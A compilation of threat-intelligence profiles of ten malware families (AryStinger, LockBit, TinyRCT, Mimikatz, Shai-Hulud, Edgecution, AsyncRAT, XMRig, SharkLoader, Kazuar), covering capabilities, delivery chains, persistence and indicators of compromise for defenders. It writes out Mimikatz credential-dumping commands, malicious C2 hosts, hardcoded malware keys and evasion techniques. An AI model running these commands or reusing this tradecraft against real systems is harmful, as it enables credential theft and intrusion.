AryStinger is a previously undocumented botnet malware family identified by QiAnXin XLab that compromises aging internet-facing edge devices, primarily end-of-life routers and some NAS appliances, and repurposes them as a distributed reconnaissance, proxy, and intrusion-support infrastructure. XLab reported at least 4,300 infected routers worldwide, with infections concentrated in South Korea and China, and with D-Link DIR-850L and DIR-818LW models on Realtek RTL819X chipsets prominently affected. The campaign was first observed on March 12, 2026, with activity spreading from 107.150.106.14 using a Linux ELF sample that reportedly had zero VirusTotal detections at the time. AryStinger primarily exploits long-known vulnerabilities in obsolete or unsupported devices rather than novel exploit chains. Reported infection vectors include CVE-2013-3307 and CVE-2016-5681 against older Linksys and D-Link routers, and a later observed Go-based variant targeting QNAP NAS devices via CVE-2025-11837 in QNAP Malware Remover. Researchers described two variants: a C-based router-focused build optimized for low-resource RTL819X devices, and a more capable Go-based NAS-focused build. Its functionality is oriented toward pre-intrusion operations rather than classic DDoS or cryptomining botnet activity. Reported capabilities include port scanning, service identification, subdomain enumeration, DNS scanning, traffic tunneling and proxying, remote command execution, and distributed task execution across infected nodes. The NAS variant was reported to support broader reconnaissance and payload execution, including shell commands and attacker-supplied Go, Java, and Python code, and to integrate tools such as fscan, ksubdomain, httpx, and Tlsx. XLab described infected devices as remotely controlled "Executors" that receive tasks from command-and-control infrastructure and return results, while also helping operators conceal their true origin behind victim network connections. AryStinger communicates with command-and-control servers over HTTP and HTTPS using Protocol Buffers with XOR obfuscation; some reporting also notes gzip in the NAS variant. A hardcoded XOR key, "sh_#@!_2024_secret," was reported. Persistence mechanisms observed include installation of an SSH backdoor using Dropbear on routers, operation on port 2332, use of gs-netcat on NAS devices, and modification of device configuration for long-term control. Reported indicators and artifacts include domains such as ajb8.com, dataexplore.cc, dataexplore.co, specific C2 hosts including eixfi[.]ajb8.com and dybic[.]ajb8.com, downloader activity from hgodpcx[.]ajb8.com and hgodpcx[.]auq8.com, binaries or files under /tmp/bin, and processes named syswapd0, syswapd0h, or syswapd0w. XLab has not attributed AryStinger to a known threat actor. Multiple reports note that its operational pattern resembles operational relay box or router-proxy infrastructures used to support follow-on intrusion activity.

LockBit is a ransomware family and Ransomware-as-a-Service (RaaS) operation active since at least 2019–2020. The content describes multiple versions and aliases including LockBit 2.0, LockBit 3.0 / LockBit Black, LockBit 4 Green, and references to LockBit 5.0 IOC reporting. LockBit is associated with double extortion, with operators encrypting victim data and exfiltrating it for additional leverage. It is described as one of the most prolific ransomware operations, with LockBit 3.0 listed as having 928 victims in 2023, and LockBit infrastructure was seized on 19 February 2024 during Operation Cronos. Observed delivery and access vectors in the content include Cobalt Strike as a common initial delivery mechanism for LockBit 3.0, exploitation of Citrix NetScaler ADC and Gateway appliances via CVE-2023-4966 (Citrix Bleed) by LockBit 3.0 affiliates, abuse of SonicWall SMA100 vulnerabilities CVE-2019-7481 and CVE-2021-20028 to install LockBit ransomware, and secondary delivery through malware chains such as StealC -> XTinyLoader -> LockBit Black. SocGholish infections were also observed leading to LockBit deployment. The content also notes living-off-the-land tradecraft and staging payloads inside password-protected ZIP or RAR archives. Behaviorally, LockBit is encryption-focused and very fast. LockBit 3.0 is described as capable of encrypting an entire computer in under one minute, requiring administrator privileges and sometimes using UAC bypass to obtain elevation. It installs itself as multiple services for persistence, attempts to terminate selected services, updates the ransom note, and changes the victim desktop wallpaper. LockBit 4 Green is described as a packed 64-bit executable with importless execution, dynamic API resolution via hashing, XOR-based string decryption, proxy DLL loading through RtlQueueWorkItem and LoadLibraryW, ETW patching, DLL notification removal, module unhooking using KnownDlls mapping and WriteProcessMemory, and vectored exception handler clearing. It checks keyboard layouts and appears to avoid encryption on Russian-language systems, checks system architecture, supports command-line options including --help and -q, decrypts an embedded ransom note with a custom RC4 algorithm, disables the Volume Shadow Copy Service and Windows Search service, writes a ransom note named Restore-My-Files.txt, excludes specific files and paths, and uses partial encryption by fully encrypting files under 1 MB and about 27% of larger files. Anti-analysis and anti-debugging features described for LockBit 3.0 include packing, code obfuscation, dynamic function resolution, password-gated execution, an encrypted .text section, heap flag checks, NtSetInformationThread with ThreadHideFromDebugger, and tampering with DbgUiRemoteBreakin. LockBit 4 Green additionally uses ETW suppression and other monitoring-evasion techniques. The content links LockBit to broad victimization across sectors and geographies. Specific examples include a ransomware attack using a LockBit variant against the Semyonishna dairy processing plant in southern Siberia. Manufacturing is noted as a heavily targeted industry among prolific ransomware operators. The content also references affiliate infrastructure and exfiltration activity, including repeated use of the hostname WIN-LIVFRVQFMKO in LockBit extortion incidents and FTP-over-TLS exfiltration infrastructure. High-confidence indicators directly mentioned in the content include the LockBit 4 Green sample hash 8ff61e4156c10b085e0c2233f24e8501, ransom note filename Restore-My-Files.txt, hostname WIN-LIVFRVQFMKO associated with LockBit extortion infrastructure, and low-confidence LockBit 5.0-related IOC reporting that includes karma0.xyz, 205.185.116.233, and MD5 e818a9afd55693d556a47002a7b7ef31. The content explicitly notes that several LockBit 5.0 indicators are inferential and high in false-positive risk.

TinyRCT is a previously undocumented lightweight C#/.NET remote access trojan and backdoor for Windows used by the Chinese-speaking threat cluster CL-STA-1062, which overlaps with UAT-7237. It has been observed in espionage-focused intrusions targeting government entities and state-owned critical energy infrastructure in Southeast Asia. Reported capabilities include arbitrary command execution via cmd.exe, remote host management, directory and file enumeration, file reading and exfiltration, screenshot capture as JPEG, downloading files from URLs, and self-deletion. TinyRCT communicates with hardcoded command-and-control infrastructure over plain HTTP, using AES-128-CBC encryption; reported details include C2 address 45.32.113[.]172, a default 10-second polling interval, and a hardcoded key "ThisIsASecretKey87654321." File exfiltration was described as occurring in 40 KB gzip-compressed AES-encrypted chunks. The malware contains a Simplified Chinese string in its code. Unit 42 found the payload hosted on attacker infrastructure at 139.180.134[.]221 as PerfWatson2.exe, a filename chosen to mimic a legitimate Microsoft Visual Studio telemetry component. TinyRCT was delivered through a DLL side-loading/AppDomainManager injection chain using a malicious archive named chrome_setup.zip containing a legitimate signed chrome_setup.exe, a malicious chrome_setup.exe.config, and a rogue MyAppDomainManager.dll. The loader checked for execution from the user Downloads directory, retrieved PerfWatson2.exe from the staging server, dropped it into %LOCALAPPDATA%, and created a scheduled task named GoogleUpdaterTaskSystem140.0.7272.0 for persistence. TinyRCT itself terminates if not running from %LOCALAPPDATA%. Its self-destruct routine uses choice.exe to delay deletion and removes its persistence scheduled task. Reported related indicators include 139.180.134[.]221, 45.32.113[.]172, PerfWatson2.exe, chrome_setup.zip, MyAppDomainManager.dll, and the scheduled task name GoogleUpdaterTaskSystem140.0.7272.0.

Mimikatz is a widely used open-source post-exploitation and credential access tool for Windows that is repeatedly referenced in the content as being used to dump credentials from LSASS memory, including via the `sekurlsa::logonpasswords` function. The content also references additional Mimikatz capabilities including pass-the-hash, pass-the-ticket, Golden Ticket abuse, DCSync (`lsadump::dcsync`), token elevation, and patching Remote Desktop with `ts::multirdp`. It is used both as a red-team tool and by threat actors in real intrusions. The content directly associates Mimikatz with credential dumping from LSASS (MITRE ATT&CK T1003/T1003.001), often requiring administrative or SYSTEM privileges. Multiple examples show execution as `mimikatz.exe`, reflective or in-memory loading through PowerShell scripts, and use in lab, detection, and intrusion scenarios. Defenders are advised in the content to monitor Sysmon Process Access events involving `lsass.exe`, suspicious strings such as `mimikatz`, and related process chains. Threat activity in the content links Mimikatz to several actors and campaigns. Palo Alto Networks Unit 42 reported that the Chinese-speaking cluster CL-STA-1062, overlapping with Cisco Talos' UAT-7237, used Mimikatz alongside SoftEther VPN, VNT, Yuze, and JuicyPotato while targeting Southeast Asian government entities and state-owned energy infrastructure from at least 2022 through 2025. Symantec also described a small opportunistic cybercrime operation in which attackers used PowerShell-delivered Mimikatz variants to dump credentials after PsExec-based access. The Makop ransomware gang is also described as using Mimikatz as part of its intrusion toolkit. The content also describes a modified embedded Mimikatz payload delivered through DLL search order hijacking: a malicious `MSVCR100.dll` loaded by Oracle-signed `unpack200.exe` decrypted and launched a modified Mimikatz 2.1.1 instance for credential theft. In that case, the malware authors removed the standard banner and changed the command-line output string from `mimikatz (command line)` to `bing (command line)` to reduce obvious detection. High-confidence indicators and artifacts directly mentioned in the content include the executable name `mimikatz.exe`, common command strings such as `privilege::debug sekurlsa::logonpasswords`, `sekurlsa::pth`, `lsadump::dcsync`, and `ts::multirdp`, and the modified output string `bing (command line)` in the unpack200/MSVCR100.dll case.

Shai-Hulud is a self-propagating software supply-chain worm and credential-stealing malware family primarily associated with malicious npm packages, later expanding into PyPI and related developer tooling ecosystems. Multiple reports attribute early waves to TeamPCP, also tracked as UNC6780, though attribution after the public release of the worm’s source code on 2026-05-12 became less certain due to copycat reuse. The malware targets developer workstations, CI/CD runners, GitHub repositories, package publishing pipelines, and cloud-connected build environments. Reported capabilities include harvesting npm and PyPI publishing credentials, GitHub tokens, GitHub CLI tokens, AWS credentials, Azure credentials, Google Cloud credentials, Kubernetes secrets, HashiCorp Vault credentials, SSH keys, Docker configuration, shell history, password-manager data, and other CI/CD secrets. Several analyses specifically describe theft from GitHub Actions runners, including scraping Runner.Worker process memory on Linux to obtain OIDC tokens and secrets, abuse of trusted publishing workflows, and use of compromised CI identities to publish malicious artifacts with valid provenance. Propagation behavior is central to the family. Shai-Hulud uses stolen npm or repository credentials to modify packages, inject malicious code, publish poisoned releases, and backdoor repositories and workflows. Reported techniques include npm lifecycle-script abuse via preinstall/postinstall hooks, execution through binding.gyp/node-gyp to evade scanners focused only on package.json scripts, Bun-based staged payload execution, malicious GitHub Actions workflow injection, and persistence through IDE and developer-tool configuration files such as .claude/settings.json, .cursor/rules/setup.mdc, .vscode/tasks.json, and .gemini/settings.json. Persistence mechanisms also include systemd services, macOS LaunchAgents, Claude Code hooks, gh-token-monitor/dead-man-switch logic, and related token-monitoring components. Exfiltration commonly uses GitHub as a dead-drop channel rather than a traditional C2 server. Reports describe the malware creating attacker-controlled or victim-account GitHub repositories, often storing encrypted stolen data under results/ paths and using campaign marker strings such as "Miasma: The Spreading Blight" or "Alright Lets See If This Works." Other reported infrastructure and markers linked to Shai-Hulud waves include the impersonation domain git-tanstack.com, staged camouflage using hxxps://api[.]anthropic[.]com/v1/api, and commit-search/dead-drop markers such as firedalazer and thebeautifulmarchoftime. The malware encrypts stolen data using public-key cryptography with AES-256-GCM; one linked incident reused the same 4096-bit RSA public key across Shai-Hulud-related tooling and a poisoned mistralai PyPI release. The family has been tied in reporting to numerous supply-chain incidents affecting legitimate package ecosystems and trusted release channels, including Red Hat npm packages, TanStack, Leo/RStreams, LiteLLM, Trivy-related activity, Nx Console, @antv, durabletask on PyPI, and a malicious mistralai==2.4.6 release. Reported impacts range from hundreds to more than a thousand compromised packages and widespread downstream exposure in environments with AWS, GitHub, and CI/CD access. In one Fortinet-investigated case linked to Shai-Hulud tradecraft, stolen Jenkins/AWS instance-role credentials were used for cloud intrusion, IAM user creation, privilege escalation, Secrets Manager and Redshift access, and exfiltration staging. Known high-confidence indicators and artifacts mentioned in the reporting include git-tanstack.com, hxxps://api[.]anthropic[.]com/v1/api, models.litellm.cloud, setup_bun.js, bun_environment.js, litellm_init.pth, updater.py, .github/workflows/discussion.yaml, .claude/settings.json, .cursor/rules/setup.mdc, and .vscode/tasks.json. Additional linked IOCs from a related poisoned mistralai release include IP 83.142.209.194, package mistralai==2.4.6, SHA256 6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b for the package archive, and SHA256 5245eb032e336b85cff0dbb3450d591826bf2ef214fd30d7eba1a763664e151b for transformers.pyz.

Edgecution is a malware framework centered on a malicious Microsoft Edge extension used to escape browser sandbox restrictions and deploy a host-level Python backdoor on Windows systems. Zscaler ThreatLabz reported that it is used in ransomware-related intrusions and assessed the activity as likely tied to an initial access broker associated with the Payouts King/Payouts Kings ransomware operation. The malware has a two-part architecture: a malicious Edge extension, often disguised as an "Edge Monitoring Agent," and a Python-based backdoor. The extension communicates with command-and-control infrastructure over WebSockets and abuses the Chrome Native Messaging protocol, including chrome.runtime.sendNativeMessage, to relay commands to the Python backdoor running on the host. This design allows the malware to bypass normal browser isolation and interact directly with the operating system. Observed capabilities include collecting system information, filesystem access and file writing, process listing, shell command execution, PowerShell execution, and execution of arbitrary Python code supplied by the attacker. The backdoor reads length-prefixed JSON messages from standard input, returns JSON responses, and in some observed descriptions executes briefly and exits after handling commands, likely to reduce detection. The malware also stores a decryption key in the Windows registry under HKCU\SOFTWARE\Microsoft\Edge as AppKey to decrypt protected strings in the Python backdoor. Initial access is achieved through social engineering. Attackers impersonate IT support personnel on Microsoft Teams and direct victims to a fake Microsoft site presented as an "Outlook Updates Management Console" or spam filter update page. The site offers multiple deployment methods, including an obfuscated AutoHotKey script, a Windows batch script, and a PowerShell script, and may also request Microsoft 365 or Outlook credentials. The infection chain delivers a malformed or encrypted ZIP archive designed to evade detection by removing ZIP magic bytes. Reported contents include an embedded Python 3.13.3 runtime and directories for the extension and native components. Deployment scripts repair the archive, extract files, create a native messaging manifest and launcher batch file, and schedule Microsoft Edge to run in headless mode with parameters such as --user-data-dir, --load-extension, --no-first-run, --disable-sync, and --headless=new. This causes the malicious extension to run in a hidden Edge instance, providing stealthy persistence while remaining invisible during normal browser use. Reported indicators of compromise include the WebSocket C2 URLs wss://d3nh8sl98s2554.cloudfront.net/ws, wss://d2g6dl71gua1qa.cloudfront.net/ws, wss://d1jp293q9tvi92.cloudfront.net/ws, and wss://d23l50n6ubud7p.cloudfront.net/ws, as well as SHA-256 hashes a08d8e63b0cd3638fb40b8e6da546e26da69439597565827f9cec87915f78568 for the extension background.js and 3d1158884fb339b3328bd330fcc27598e1f1c94bcac39e75d1a272afa4deee1a for the Python backdoor.

AsyncRAT is a .NET remote access trojan (RAT) and commodity malware family that can monitor and remotely control infected Windows systems. It was introduced on GitHub as open-source remote administration software and is widely abused by threat actors for malicious purposes. Reported capabilities in the provided content include remote control, screen recording, checking whether the current user has administrator privileges, and hiding scheduled task execution via ProcessWindowStyle.Hidden. In broader reporting cited here, AsyncRAT is also described as a follow-on payload or backdoor used to give attackers full control over compromised systems. Observed delivery and infection chains in the content show AsyncRAT being distributed through multiple common initial access mechanisms. One chain used phishing emails with malicious Microsoft OneNote .one attachments that tricked users into launching embedded HTA, VBS, or WSF files via wscript.exe or mshta.exe; subsequent cmd.exe and PowerShell activity downloaded a malicious batch file and decoy notebook, and the final payload was AsyncRAT or similar info-stealing malware. Another analyzed malspam-driven chain used a ZIP archive named in the pattern E-STATMENT<digits>.exe.zip containing a Nullsoft installer and a PyInstaller-packed secondary payload; dynamic analysis linked its command-and-control traffic to AsyncRAT at 144.126.151.185:2005, with persistence via a Startup .lnk and HKCU\Software\fontdrvhost. Additional reporting in the content describes AI-themed lure archives delivering AsyncRAT through a complex multi-stage chain involving a malicious LNK, hidden PDFs, layered PowerShell, AutoHotkey-based loaders, scheduled tasks, process hollowing into legitimate .NET executables, and Microsoft Defender exclusions; one AsyncRAT branch in that campaign communicated with 107.172.10.190. AsyncRAT also appears repeatedly as a secondary payload delivered by other malware ecosystems and loaders. The content explicitly links it to StealC affiliate activity, Amadey botnet clusters, and SocGholish/FakeUpdates infections. Proofpoint and IBM X-Force observed StealC-linked activity delivering AsyncRAT alongside Amadey, RedLine Stealer, Vidar, XTinyLoader, XMRig, SectopRAT, HijackLoader, SmokeLoader, zgRAT, and in some cases LockBit Black ransomware. ESET reporting cited here notes AsyncRAT among payloads distributed in the Amadey ecosystem. Orange Cyberdefense reporting cited in the content states SocGholish infections delivered loaders such as GhoLoader and MintsLoader that led to GhostWeaver, LockBit, RansomHub, AsyncRAT, and NetSupport RAT. MITRE ATT&CK content included here also notes AsyncRAT among malware obtained by threat actors during Operation Spalax. Targeting in the provided material is broad and largely opportunistic, consistent with commodity RAT usage. The content references phishing, fake updates, gaming-themed lures, AI-themed lure documents, and malware delivery through compromised websites. Geographic reporting cited here notes that in 2025 AsyncRAT was among the top malware families in Mexico by unique victims. No single threat actor is uniquely associated with AsyncRAT in the provided content; instead it is used across multiple criminal delivery ecosystems. High-confidence indicators and artifacts directly mentioned in the content include the C2 IP 144.126.151.185:2005 from one analyzed infection chain; the IP 107.172.10.190 from an AI-lure campaign branch delivering AsyncRAT; and a public sandboxed sample masquerading as a gaming-related file named "Escape From Tarkov‮nls..scr" with SHA1 3065DA0D35988807C34C98164D35385F846AB1DF and SHA256 84C8AD42D82A82951A1968C738FC813A83FC5CD6F1C2F446F2960CF21A373E14. The content also references inbound and outbound traffic to infrastructure associated with AsyncRAT and repeated use of Windows-native scripting and LOLBins during delivery.

XMRig is an open-source cryptocurrency miner, most commonly used to mine Monero (XMR), that is frequently repurposed and maliciously modified for cryptojacking campaigns on both Windows and Linux systems. The content shows XMRig being deployed as a primary payload or follow-on payload by multiple malware families and intrusion chains, including Orchard, Blue Mockingbird, Blitz, Outlaw/Dota, Prometei, Cliptomaner, MrbMiner, Librarian Ghouls, StealC-linked activity, DanaBot supply-chain activity, and opportunistic post-exploitation following exploitation of public-facing applications. Observed delivery vectors and installation methods include phishing and paste-and-run lures, compromised NPM packages, SQL Server compromise, brute-force attacks against MS SQL or SSH, malware loaders and downloaders, trojanized software and game cheats, and exploitation of vulnerabilities such as React2Shell and SAP CVE-2025-31324-related activity. Across the referenced incidents, XMRig commonly runs as a Monero miner connecting to mining pools over ports such as 3333, and is often disguised as legitimate or system-related binaries such as conhost.exe, svchost.exe, csrss.exe, kswapd0, or Windows Update Service.exe. Several cases explicitly describe maliciously modified XMRig builds, including versions 6.15.2, 6.19.0, 6.22.1, and 6.19.0 embedded in Linux campaigns. Modifications and surrounding tradecraft include process hollowing, watchdog processes, persistence via Windows services, scheduled tasks, Run keys, WMI permanent event subscriptions, COR_PROFILER abuse, SSH authorized_keys replacement, cron persistence, and use of kernel drivers such as WinRing0x64.sys to improve mining performance. Some campaigns also relay XMRig JSON-RPC traffic through command-and-control infrastructure; Orchard, for example, used DGA-generated domains plus ojena.duckdns.org to control XMRig and forwarded unencrypted XMRig JSON-RPC traffic identifying XMRig/6.15.2. The malware is associated with broad victimology rather than a single sector. The content places XMRig on enterprise servers, terminal servers, SQL servers, Linux hosts, cloud systems, industrial control system environments, and user workstations. It appears in financially motivated cryptojacking, mixed monetization chains that also include ransomware or credential theft, and commodity malware ecosystems where loaders or stealers deliver secondary payloads. Notable indicators directly mentioned in the content include ojena.duckdns.org, hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh, and mining-pool communications over port 3333. High-confidence file and path examples include C:\ProgramData\Microsoft\Crypto\conhost.exe, /var/tmp/.xlamb, and Linux miner filenames such as kswapd0. Overall, the content consistently characterizes XMRig as legitimate mining software that is widely abused or modified by threat actors for unauthorized resource hijacking and persistence.

SharkLoader is a previously undocumented malware loader identified by Kaspersky in the broader StrikeShark intrusion campaign. Its primary role is to deploy Cobalt Strike Beacon on compromised Windows systems. Researchers first identified it while investigating activity targeting a diplomatic organization in Indonesia, and related activity was observed against government, diplomatic, software development, and other organizations in Indonesia, Taiwan, Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Nepal, and Serbia. Observed delivery included exploitation of internet-facing applications and custom droppers masquerading as legitimate software such as Cisco AnyConnect and Google Update. Reported exploited products and vulnerabilities associated with the broader campaign included Microsoft Exchange (including CVE-2021-26855 and CVE-2022-41082), Openfire (CVE-2023-32315), GeoServer (CVE-2024-36401), Apache Shiro (CVE-2016-4437), Hikvision (CVE-2021-36260), Microsoft SharePoint (CVE-2021-27076), Zimbra (CVE-2022-27925), F5 BIG-IP (CVE-2023-46747), Fortinet FortiOS (CVE-2022-40684 and CVE-2024-21762), React Server Components (CVE-2025-55182), and Cisco IOS XE Web UI (CVE-2023-20198). Some droppers also displayed decoy PDF documents while silently installing the malware. Technically, SharkLoader abuses DLL side-loading, commonly via the legitimate Windows binary SystemSettings.exe loading a malicious SystemSettings.dll. Variants also used alternative sideloading targets including msedge.dll, PrintDialog.dll, and miracastview.dll. The malware uses the Perfect DLL Hijacking technique, decrypts staged components such as DscCoreR.mui and SyncRes.dat/SyncRest.dat, and loads Cobalt Strike Beacon in memory. Reported cryptographic details include Blowfish decryption of DscCoreR.mui and AES-128 decryption of SyncRes.dat. SharkLoader also installs API hooks using Microsoft Detours and MinHook, including hooks on VirtualAlloc and Sleep to reduce memory-scanning visibility, and suppresses ETW logging by hooking EtwEventWrite, EventWriteEx, and EventWrite. SharkLoader itself does not contain built-in persistence in all observed cases, but the associated intrusion activity used web shells, Registry Run keys, and scheduled tasks to relaunch the sideloading chain. Observed task and persistence artifacts included scheduled tasks executing SystemSettings.exe, a Run key named MFUpdate, and a scheduled task named \Microsoft\Windows\Edge\Edgeupdate. Post-compromise activity included reconnaissance, Active Directory enumeration, credential theft from LSASS and the NTDS database, and use of tools such as FScan, Searchall, Pillager, SharpGPOAbuse, Procdump64, ntdsutil, Cobalt Strike, and web shells. Attribution remains unconfirmed. Kaspersky reported no direct code or infrastructure overlap with known threat groups, but assessed with low confidence that the operators may be Chinese-speaking based on use of open-source post-compromise tools associated with Chinese-speaking developers. Reported indicators of compromise associated with the campaign included domains connect-microsoft.com, ms-record.com, ms-record.top, and ms-tray.top, and hashes including C559CC68986933200FD5D9E4388E2F58, B3352B42432DEDC4A519F011DC8B5D5A, 24FCEBDEECBA65004FDB0923763D74FD, 9C872A0D5D5A38950E8B9AC9B488BE3F, AA3086BE652C8B20B0B29B2730D57119, A514D1BB62D7916475946FE7C07AC0AA, and 9CBD560F820C95D7C38342CD558CB5C6.

Kazuar is a Turla backdoor and espionage implant, described in the content as Turla’s flagship backdoor and a long-running malware framework active since at least 2015 and used since at least 2017. It is associated with the Russia-linked threat actor Turla, also referred to in the content as Secret Blizzard and Venomous Bear, and has been used in cyberespionage operations including against military and defense targets in Ukraine and in compromises of government organizations. The content also describes operational collaboration in which Gamaredon tooling, including PteroGraphin and PteroOdd, was used to deploy Kazuar on compromised Ukrainian targets and in at least one case restore Turla’s access. Capabilities directly mentioned in the content include installing itself as a new Windows service for persistence, gathering information on users, obtaining a list of running processes through WMI querying, capturing images from the webcam, launching JavaScript on the device, stealing data from event logs, collecting information about system files, and stealing authentication tokens, cookies, and credentials from a wide variety of programs including browsers, FTP clients, VPN software, KeePass, Azure, AWS, and Outlook. Kazuar stages command output and collected data in files before exfiltration. It communicates with command-and-control servers over HTTP and HTTPS, encodes communications in Base64, and can also act as a webserver listening for inbound HTTP requests through an exposed API. The content further notes that Kazuar has used compromised WordPress blogs as command-and-control servers. The content also describes newer Kazuar evolution into a modular espionage framework with Kernel, Bridge, and Worker modules. In that reporting, the Kernel coordinates tasks, configuration updates, and anti-analysis checks; the Bridge proxies external communications; and Worker modules perform keystroke capture, screenshot capture, file harvesting, window monitoring, and email collection. Reported communication paths include HTTP, WebSockets, and Exchange Web Services, with internal routing via hidden Windows messaging, named pipes, Mailslots, and Google Protocol Buffers. Some Kazuar payloads are described as cryptographically tied to a victim hostname, and delivery methods mentioned include the Pelmeni dropper and a .NET COM-object loader that decrypts and executes payloads in memory. Observed infrastructure and indicators mentioned in the content include compromised WordPress sites used for C2 and the following Kazuar-related domains and URLs from one reported victim network: bombheros[.]com, simplifiedhomesales[.]com, mtsoft.hol[.]es, polishpod101[.]com, echange-afrique-insa[.]fr, afci-newsoft[.]fr, antoniosalieri[.]es, and aviatnetworks[.]com. The content also lists in-the-wild filenames including dbgsview.exe, DebugView.exe, adflctlmon.exe, PSExtendPrivacy.exe, and Agent.exe; .NET module version IDs 7c1a417d-961e-4fbd-9df7-7b99994eaec7, 2cde886e-ee24-496a-bb31-1ced6b766ced, 76b7b11a-4124-448b-9903-15524e321f3f, and d3429016-d029-45b8-b260-85221265838e; and SHA256 samples 69908f05b436bd97baae56296bf9b9e734486516f9bb9938c2b8752e152315d4, c1f278f88275e07cc03bd390fe1cbeedd55933110c6fd16de4187f4c4aaf42b9, 6eb31006ca318a21eb619d008226f08e287f753aec9042269203290462eaa00d, and 436cfce71290c2fc2f2c362541db68ced6847c66a73b55487e5e5c73b0636c85.